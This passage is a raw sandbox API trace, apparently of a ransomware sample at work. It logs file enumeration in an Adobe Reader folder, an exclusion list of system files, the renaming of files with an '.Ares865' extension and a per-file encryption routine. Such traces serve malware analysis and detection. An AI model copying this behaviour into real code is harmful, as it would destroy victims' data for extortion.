hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.297] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.298] CloseHandle (hObject=0x170) returned 1 [0154.298] CloseHandle (hObject=0x118) returned 1 [0154.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.298] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LueMinut.htm", cAlternateFileName="")) returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="aoldtz.exe") returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2=".") returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="..") returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="windows") returned -1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="bootmgr") returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="temp") returned -1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="pagefile.sys") returned -1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="boot") returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="ids.txt") returned 1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="ntuser.dat") returned -1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="perflogs") returned -1 [0154.298] lstrcmpiW (lpString1="LueMinut.htm", lpString2="MSBuild") returned -1 [0154.298] lstrlenW (lpString="LueMinut.htm") returned 12 [0154.298] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm") returned 54 [0154.298] lstrcpyW (in: lpString1=0x2cce452, lpString2="LueMinut.htm" | out: lpString1="LueMinut.htm") returned="LueMinut.htm" [0154.298] lstrlenW (lpString="LueMinut.htm") returned 12 [0154.298] lstrlenW (lpString="Ares865") returned 7 [0154.298] lstrcmpiW (lpString1="nut.htm", lpString2="Ares865") returned 1 [0154.299] lstrlenW (lpString=".dll") returned 4 [0154.299] lstrcmpiW (lpString1="LueMinut.htm", lpString2=".dll") returned 1 [0154.299] lstrlenW (lpString=".lnk") returned 4 [0154.299] lstrcmpiW (lpString1="LueMinut.htm", lpString2=".lnk") returned 1 [0154.299] lstrlenW (lpString=".ini") returned 4 [0154.299] lstrcmpiW (lpString1="LueMinut.htm", lpString2=".ini") returned 1 [0154.299] lstrlenW (lpString=".sys") returned 4 [0154.299] lstrcmpiW (lpString1="LueMinut.htm", lpString2=".sys") returned 1 [0154.299] lstrlenW (lpString="LueMinut.htm") returned 12 [0154.299] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm.Ares865") returned 61 [0154.299] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm.ares865"), dwFlags=0x1) returned 1 [0154.301] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.301] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17230) returned 1 [0154.301] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.302] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.303] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4650, lpName=0x0) returned 0x170 [0154.304] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4650) returned 0x190000 [0154.305] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.306] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.306] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.307] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.307] CloseHandle (hObject=0x170) returned 1 [0154.307] CloseHandle (hObject=0x118) returned 1 [0154.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.307] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54816ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54816ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader", cAlternateFileName="")) returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="aoldtz.exe") returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2=".") returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="..") returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="windows") returned -1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="bootmgr") returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="temp") returned -1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="pagefile.sys") returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="boot") returned 1 [0154.307] lstrcmpiW (lpString1="Reader", lpString2="ids.txt") returned 1 [0154.308] lstrcmpiW (lpString1="Reader", lpString2="ntuser.dat") returned 1 [0154.308] lstrcmpiW (lpString1="Reader", lpString2="perflogs") returned 1 [0154.308] lstrcmpiW (lpString1="Reader", lpString2="MSBuild") returned 1 [0154.308] lstrlenW (lpString="Reader") returned 6 [0154.308] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm") returned 53 [0154.308] lstrcpyW (in: lpString1=0x2cce452, lpString2="Reader" | out: lpString1="Reader") returned="Reader" [0154.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78e8 [0154.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f2030 [0154.308] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78f0 | out: ListHead=0x2e7710, ListEntry=0x2e78f0) returned 0x2e78d0 [0154.308] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4176, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMe.htm", cAlternateFileName="")) returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="aoldtz.exe") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2=".") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="..") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="windows") returned -1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="bootmgr") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="temp") returned -1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="pagefile.sys") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="boot") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="ids.txt") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="ntuser.dat") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="perflogs") returned 1 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2="MSBuild") returned 1 [0154.308] lstrlenW (lpString="ReadMe.htm") returned 10 [0154.308] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader") returned 47 [0154.308] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMe.htm" | out: lpString1="ReadMe.htm") returned="ReadMe.htm" [0154.308] lstrlenW (lpString="ReadMe.htm") returned 10 [0154.308] lstrlenW (lpString="Ares865") returned 7 [0154.308] lstrcmpiW (lpString1="dMe.htm", lpString2="Ares865") returned 1 [0154.308] lstrlenW (lpString=".dll") returned 4 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2=".dll") returned 1 [0154.308] lstrlenW (lpString=".lnk") returned 4 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2=".lnk") returned 1 [0154.308] lstrlenW (lpString=".ini") returned 4 [0154.308] lstrcmpiW (lpString1="ReadMe.htm", lpString2=".ini") returned 1 [0154.309] lstrlenW (lpString=".sys") returned 4 [0154.309] lstrcmpiW (lpString1="ReadMe.htm", lpString2=".sys") returned 1 [0154.309] lstrlenW (lpString="ReadMe.htm") returned 10 [0154.309] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm.Ares865") returned 59 [0154.309] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm.ares865"), dwFlags=0x1) returned 1 [0154.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16758) returned 1 [0154.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.311] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.312] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.312] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.312] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4480, lpName=0x0) returned 0x170 [0154.314] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4480) returned 0x190000 [0154.316] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.316] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.316] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.316] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.316] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.316] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.317] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.317] CloseHandle (hObject=0x170) returned 1 [0154.317] CloseHandle (hObject=0x118) returned 1 [0154.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.318] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3f71, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeCS.htm", cAlternateFileName="")) returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="aoldtz.exe") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2=".") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="..") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="windows") returned -1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="bootmgr") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="temp") returned -1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="pagefile.sys") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="boot") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="ids.txt") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="ntuser.dat") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="perflogs") returned 1 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2="MSBuild") returned 1 [0154.318] lstrlenW (lpString="ReadMeCS.htm") returned 12 [0154.318] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm") returned 51 [0154.318] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeCS.htm" | out: lpString1="ReadMeCS.htm") returned="ReadMeCS.htm" [0154.318] lstrlenW (lpString="ReadMeCS.htm") returned 12 [0154.318] lstrlenW (lpString="Ares865") returned 7 [0154.318] lstrcmpiW (lpString1="eCS.htm", lpString2="Ares865") returned 1 [0154.318] lstrlenW (lpString=".dll") returned 4 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2=".dll") returned 1 [0154.318] lstrlenW (lpString=".lnk") returned 4 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2=".lnk") returned 1 [0154.318] lstrlenW (lpString=".ini") returned 4 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2=".ini") returned 1 [0154.318] lstrlenW (lpString=".sys") returned 4 [0154.318] lstrcmpiW (lpString1="ReadMeCS.htm", lpString2=".sys") returned 1 [0154.318] lstrlenW (lpString="ReadMeCS.htm") returned 12 [0154.319] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm.Ares865") returned 61 [0154.319] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm.ares865"), dwFlags=0x1) returned 1 [0154.321] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.321] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16241) returned 1 [0154.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.321] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.322] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.322] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.322] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4280, lpName=0x0) returned 0x170 [0154.324] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4280) returned 0x190000 [0154.325] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.326] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.326] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.327] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.327] CloseHandle (hObject=0x170) returned 1 [0154.327] CloseHandle (hObject=0x118) returned 1 [0154.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.327] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3fa1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeCT.htm", cAlternateFileName="")) returned 1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="aoldtz.exe") returned 1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2=".") returned 1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="..") returned 1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="windows") returned -1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="bootmgr") returned 1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="temp") returned -1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="pagefile.sys") returned 1 [0154.327] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="boot") returned 1 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="ids.txt") returned 1 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="ntuser.dat") returned 1 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="perflogs") returned 1 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2="MSBuild") returned 1 [0154.328] lstrlenW (lpString="ReadMeCT.htm") returned 12 [0154.328] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm") returned 53 [0154.328] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeCT.htm" | out: lpString1="ReadMeCT.htm") returned="ReadMeCT.htm" [0154.328] lstrlenW (lpString="ReadMeCT.htm") returned 12 [0154.328] lstrlenW (lpString="Ares865") returned 7 [0154.328] lstrcmpiW (lpString1="eCT.htm", lpString2="Ares865") returned 1 [0154.328] lstrlenW (lpString=".dll") returned 4 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2=".dll") returned 1 [0154.328] lstrlenW (lpString=".lnk") returned 4 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2=".lnk") returned 1 [0154.328] lstrlenW (lpString=".ini") returned 4 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2=".ini") returned 1 [0154.328] lstrlenW (lpString=".sys") returned 4 [0154.328] lstrcmpiW (lpString1="ReadMeCT.htm", lpString2=".sys") returned 1 [0154.328] lstrlenW (lpString="ReadMeCT.htm") returned 12 [0154.328] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm.Ares865") returned 61 [0154.329] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm.ares865"), dwFlags=0x1) returned 1 [0154.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 